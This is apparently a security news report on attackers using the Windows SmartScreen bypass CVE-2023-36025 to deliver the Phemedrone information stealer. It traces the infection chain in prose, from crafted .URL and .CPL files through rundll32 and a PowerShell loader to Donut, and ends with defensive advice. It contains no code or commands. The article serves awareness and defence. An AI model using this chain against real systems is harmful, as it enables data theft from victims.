Cybercriminals Exploit Windows Flaw to Unleash Phemedrone Stealer

In a concerning development, cyber threat actors are capitalizing on a recently-patched security flaw in Microsoft Windows to deploy the Phemedrone Stealer, an open-source information-stealing tool. The researchers discovered that Phemedrone specifically targets web browsers and extracts data from cryptocurrency wallets and messaging platforms like Telegram, Steam, and Discord.

The malware goes beyond data theft by capturing screenshots and gathering comprehensive system information, including hardware details, location data, and operating system specifications. Subsequently, the pilfered data is transmitted to the attackers through the Telegram messaging platform or their command-and-control (C&C) server.

The utilized security vulnerability, CVE-2023-36025 (CVSS score: 8.8), is a security bypass flaw in Windows SmartScreen. Exploiting this vulnerability involves tricking users into clicking on a specially crafted Internet Shortcut (.URL) or a hyperlink pointing to such a file. Microsoft addressed this actively exploited vulnerability as part of its November 2023 Patch Tuesday updates.

The infection process unfolds as threat actors host malicious Internet Shortcut files on platforms like Discord or cloud services such as FileTransfer.io. To further obscure their activities, attackers leverage URL shorteners like Short URL. The execution of the compromised .URL file enables it to connect to a server controlled by the threat actors and execute a control panel (.CPL) file. Notably, this process circumvents Windows Defender SmartScreen due to the exploitation of CVE-2023-36025.

The malicious .CPL file, when executed through the Windows Control Panel process binary, invokes rundll32.exe to execute a DLL. This DLL serves as a loader, prompting Windows PowerShell to download and execute the next stage of the attack, hosted on GitHub. The subsequent payload is a PowerShell loader named “DATA3.txt,” acting as a launchpad for Donut, an open-source shellcode loader responsible for decrypting and executing the Phemedrone Stealer.

Phemedrone Stealer, coded in C#, remains actively maintained by its developers on platforms like GitHub and Telegram. This tool is adept at pilfering sensitive information from compromised systems, underlining the adaptability of threat actors in exploiting disclosed vulnerabilities for maximum impact.

Despite the patch released by Microsoft, threat actors persist in exploiting CVE-2023-36025, evading Windows Defender SmartScreen protections. This persistence poses an ongoing threat, enabling the deployment of various malware types, including ransomware and information-stealing tools like Phemedrone Stealer.

Mitigating the risk posed by threat actors exploiting a Windows security flaw involves swift action. Ensure all systems are updated with the latest security patches, especially those addressing vulnerabilities like CVE-2023-36025. Implementing robust email and web filtering solutions can prevent users from falling victim to phishing attempts. Regularly monitoring network traffic for anomalies and staying abreast of security updates will enhance the overall resilience against the deployment of information stealers like Phemedrone.